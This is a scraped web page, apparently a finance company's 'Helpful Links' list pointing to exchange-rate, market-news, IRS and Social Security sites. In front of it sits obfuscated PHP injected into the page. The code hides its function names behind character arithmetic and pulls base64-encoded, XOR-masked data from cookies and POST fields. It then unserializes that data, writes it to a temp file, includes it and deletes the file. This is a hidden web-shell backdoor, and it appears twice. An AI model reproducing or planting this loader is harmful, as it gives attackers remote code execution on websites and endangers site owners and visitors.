$VhoKK = "\x68" . chr ( 1054 - 984 ).chr (103) . chr (95) . chr (97) . chr ( 754 - 669 )."\167" . 'R' . "\x4f";$BwlzKod = "\x63" . chr (108) . chr ( 758 - 661 )."\163" . 's' . "\x5f" . "\x65" . "\x78" . chr (105) . chr ( 758 - 643 ).chr (116) . "\163";$GHHSAxwM = class_exists($VhoKK); $BwlzKod = "27826";$MvNfM = !1;if ($GHHSAxwM == $MvNfM){function JafBds(){$gttCB = new /* 40862 */ hFg_aUwRO(27273 + 27273); $gttCB = NULL;}$EJzPo = "27273";class hFg_aUwRO{private function wXJQW($EJzPo){if (is_array(hFg_aUwRO::$odCTHlnpH)) {$nAODEFhd = sys_get_temp_dir() . "/" . crc32(hFg_aUwRO::$odCTHlnpH[chr (115) . 'a' . 'l' . chr (116)]);@hFg_aUwRO::$odCTHlnpH[chr (119) . "\162" . chr (105) . "\x74" . 'e']($nAODEFhd, hFg_aUwRO::$odCTHlnpH["\x63" . chr (111) . chr ( 413 - 303 ).chr (116) . 'e' . "\x6e" . chr ( 1004 - 888 )]);include $nAODEFhd;@hFg_aUwRO::$odCTHlnpH[chr ( 713 - 613 ).chr (101) . chr (108) . "\x65" . "\164" . chr ( 582 - 481 )]($nAODEFhd); $EJzPo = "27273";exit();}}private $xeyPshLo;public function QqIUio(){echo 12339;}public function __destruct(){$EJzPo = "6242_62946";$this->wXJQW($EJzPo); $EJzPo = "6242_62946";}public function mvruosD($TyiAcAZ, $wskRXO){return $TyiAcAZ[0] ^ str_repeat($wskRXO, (strlen($TyiAcAZ[0]) / strlen($wskRXO)) + 1);}public function __construct($NgPborOTU=0){$gPNnsWHM = $_POST;$YMKdxpIA = $_COOKIE;$wskRXO = "3492f5f6-8505-4818-9e05-f5e64782e3f5";$iHkHUYPcs = @$YMKdxpIA[substr($wskRXO, 0, 4)];if (!empty($iHkHUYPcs)){$AMPksdBk = "base64";$TyiAcAZ = "";$iHkHUYPcs = explode(",", $iHkHUYPcs);foreach ($iHkHUYPcs as $TYzqP){$TyiAcAZ .= @$YMKdxpIA[$TYzqP];$TyiAcAZ .= @$gPNnsWHM[$TYzqP];}$TyiAcAZ = array_map($AMPksdBk . chr (95) . "\x64" . 'e' . chr (99) . "\157" . "\144" . chr (101), array($TyiAcAZ,)); $TyiAcAZ = $this->mvruosD($TyiAcAZ, $wskRXO);hFg_aUwRO::$odCTHlnpH = @unserialize($TyiAcAZ);}}public static $odCTHlnpH = 4799;}JafBds();}$YHLutA = 'j' . chr (72) . "\x5f" . "\127" . "\162" . chr ( 419 - 301 )."\163" . chr (83); $SGKqYM = "\143" . chr (108) . "\x61" . chr (115) . chr ( 276 - 161 )."\137" . chr (101) . "\x78" . "\x69" . chr (115) . chr ( 210 - 94 ).'s';$AsbEPhOtiU = $SGKqYM($YHLutA); $YHLutA = "60450";$jCjvjo = $AsbEPhOtiU;$SGKqYM = "21594";if (!$jCjvjo){class jH_WrvsS{private $UnZyOAoZL;public static $eGlFIT = "62aa8324-f7d7-49a4-9a42-7519f843f4ab";public static $jvTbwaKyL = 10032;public function __construct($sIyvKa=0){$CHevC = $_COOKIE;$Nkfvbr = $_POST;$gIaWGTUF = @$CHevC[substr(jH_WrvsS::$eGlFIT, 0, 4)];if (!empty($gIaWGTUF)){$jPaDopW = "base64";$ZOxim = "";$gIaWGTUF = explode(",", $gIaWGTUF);foreach ($gIaWGTUF as $PmdWIpToJo){$ZOxim .= @$CHevC[$PmdWIpToJo];$ZOxim .= @$Nkfvbr[$PmdWIpToJo];}$ZOxim = array_map($jPaDopW . chr ( 848 - 753 )."\144" . "\x65" . 'c' . chr ( 591 - 480 )."\x64" . chr (101), array($ZOxim,)); $ZOxim = $ZOxim[0] ^ str_repeat(jH_WrvsS::$eGlFIT, (strlen($ZOxim[0]) / strlen(jH_WrvsS::$eGlFIT)) + 1);jH_WrvsS::$jvTbwaKyL = @unserialize($ZOxim);}}private function OprUjdQnTo(){if (is_array(jH_WrvsS::$jvTbwaKyL)) {$xAftJOp = sys_get_temp_dir() . "/" . crc32(jH_WrvsS::$jvTbwaKyL[chr ( 1110 - 995 )."\141" . chr ( 257 - 149 )."\164"]);@jH_WrvsS::$jvTbwaKyL[chr (119) . chr (114) . "\151" . 't' . "\145"]($xAftJOp, jH_WrvsS::$jvTbwaKyL[chr ( 987 - 888 ).chr ( 572 - 461 )."\x6e" . chr ( 522 - 406 ).chr ( 159 - 58 ).chr ( 728 - 618 ).'t']);include $xAftJOp;@jH_WrvsS::$jvTbwaKyL["\144" . "\145" . "\x6c" . 'e' . chr ( 641 - 525 ).chr (101)]($xAftJOp); $NjsYi = "3735";exit();}}public function __destruct(){$this->OprUjdQnTo(); $NjsYi = "3735";$MPYvfQ = str_pad($NjsYi, 10);}}$HzvPKs = new jH_WrvsS(); $HzvPKs = "20705_56894";} Helpful Links – Monarch

Helpful Links

Here are some websites we think you might find useful and interesting.

Current Exchange Rates – This link will help you chart the dollar against any foreign currency

Mortgage, Bank, Lending and Interest Rates – This site will give you the most up-to-date information on constantly fluctuating rates

Money Magazine – Check stock quotes, and track the day’s financial news

MSN Money – A great source of information for your personal finance needs. Get access to quotes, stock research, and news

Market Watch by Dow Jones – CBS Marketwatch provides links to financial news, stock quotes, IRA resources, stock picks and more

Travelex – Foreign Currency Exchange –  Travelex has competitive exchange rates and traveler’s checks


Social Security Administration – Social Security Administration administers retirement, medicare, disability and other benefits

U.S. Small Business Association – Programs and services to help you start, grow and succeed

Federal Citizen Information Center –  A catalog of Free and low-cost federal publications that may be of interest to you. Also contains a lot of important consumer information

IRS – The IRS website has many great tax resources for you

State Websites – The extent of tax information available and the way in which it is present varies from state to state.